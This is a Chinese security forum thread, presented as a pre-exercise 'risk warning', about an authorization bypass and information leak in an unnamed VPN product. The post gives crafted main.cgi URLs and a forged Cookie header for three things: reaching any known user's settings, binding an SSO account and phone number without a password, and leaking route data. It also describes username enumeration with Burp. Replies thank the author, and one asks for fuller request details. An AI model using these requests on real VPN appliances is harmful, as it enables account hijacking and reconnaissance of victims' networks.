查看: 22376|回复: 3

【风险预警】某捷VPN越权绑定&信息泄露

[复制链接]
发表于 2021-2-26 22:13:40 | 显示全部楼层 |阅读模式
0x01 简述
HVV临近,现预警一个某捷VPN的信息泄露及越权绑定SSO账号及手机号的问题
注:需要知道存在的VPN用户,当然如果不知道的话,可以使用文章后面的那个方法进行用户名爆破
话不多说先上图
1.png


0x02 越权绑定
首先打开VPN登录页,可以看到是这样子的
2.png

直接构造URL:
https://1.1.1.1/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=USERNAME&sid=1614345312&oper=showres
USERNAME为已存在的用户名,访问后即可进入到这样一个界面
3.png

然后我们点击左侧的“个人设置”
4.png

在如上图功能这里,没有任何密码验证,可以直接给这个用户绑定SSO账号及手机号
5.png

0x03 信息泄露
直接构造URL:
https://1.1.1.1/cgi-bin/main.cgi?oper=getrsc
注:需要先使用第一步的方式构造URL进入到设置页面,否则没有Cookie,会提示“错误:当前用户不在线,请重新登录”,当然你也可以手动构造Cookie
Cookie: UserName=USERNAME; SessionId=1614345312; FirstVist=1; Skin=1; tunnel=1

然后再打开的页面,就可以看到他VPN现有的路由信息
6.png

同时,通过Burp抓包可以发现,如果用户名是正确的,这个页面才会返回路由信息
7.png

如果用户是不存在的,就不会返回
8.png

通过这个方法,可以使用Burp进行用户名爆破

回复

使用道具 举报

发表于 2026-5-19 19:10:09 | 显示全部楼层

Re: 【风险预警】某捷VPN越权绑定&信息泄露

感谢分享这个风险预警,HVV临近,这样的漏洞确实值得警惕。越权绑定SSO账号和手机号、通过返回差异进行用户名爆破,都是比较直接的安全隐患。提醒大家及时排查相关设备配置,避免被利用。
回复 支持 反对

使用道具 举报

发表于 2026-6-21 21:10:00 | 显示全部楼层

Re: 【风险预警】某捷VPN越权绑定&信息泄露

感谢楼主分享这个安全漏洞预警,HVV期间这种信息确实很有价值。 从描述看,越权绑定SSO账号和手机号这个问题很严重,没有二次验证就能直接修改用户关键信息,说明权限校验存在明显缺失。信息泄露那块,结合用户名字典就能爆破并获取路由信息,也容易让攻击者进一步利用。 请问楼主有没有尝试过联系厂商报告这个漏洞?或者目前是否有临时缓解措施,比如建议用户暂时修改默认配置或关闭某些接口?另外,那个Burp爆破用户名的方法,如果能再补充一下详细的请求包结构或工具配置,对大家测试自己环境会很有帮助。
回复 支持 反对

使用道具 举报

发表于 2026-6-21 23:15:00 | 显示全部楼层

Re: 【风险预警】某捷VPN越权绑定&信息泄露

感谢分享这个风险预警,HVV期间这类漏洞确实需要重点关注。构造URL直接绕过验证绑定SSO和手机号,以及通过路由信息回显来爆破用户名,思路很清晰。建议用这个VPN的同行尽快排查修复,防止被利用。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 07:36 , Processed in 0.042256 second(s), 20 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部